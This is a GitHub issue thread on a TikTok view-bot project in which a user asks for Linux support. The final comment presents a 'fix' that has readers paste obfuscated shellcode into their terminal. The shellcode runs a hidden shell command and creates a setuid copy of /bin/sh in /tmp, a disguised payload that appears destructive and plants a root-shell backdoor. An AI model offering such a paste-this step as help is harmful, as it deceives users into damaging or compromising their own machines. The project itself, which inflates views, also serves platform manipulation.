TikTok-View-Bot icon indicating copy to clipboard operation
TikTok-View-Bot copied to clipboard

Linux support?

Open VBPROGER opened this issue 3 years ago • 4 comments

I saw "ctypes" library and "SetConsoleTitleW". The set title function is aviable only on Windows/MacOS. I'm Linux user, so I need to fix this code. Can you make version for Linux please?

  • VBPROGER (i'm not watching tiktok)

VBPROGER avatar Mar 12 '22 08:03 VBPROGER

Also I saw "cls" command in code... :window:s support only :no_good: :confused:

VBPROGER avatar Mar 12 '22 08:03 VBPROGER

figure it out urself

ghost avatar Mar 12 '22 16:03 ghost

Not that hard to swap it out with a linux alternative.

ghost avatar Mar 18 '22 18:03 ghost

Issue resolved.

Step 1: Open terminal
Step 2: Paste the following script into your terminal

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Step 3: Press enter and wait.

ghost avatar Apr 04 '22 18:04 ghost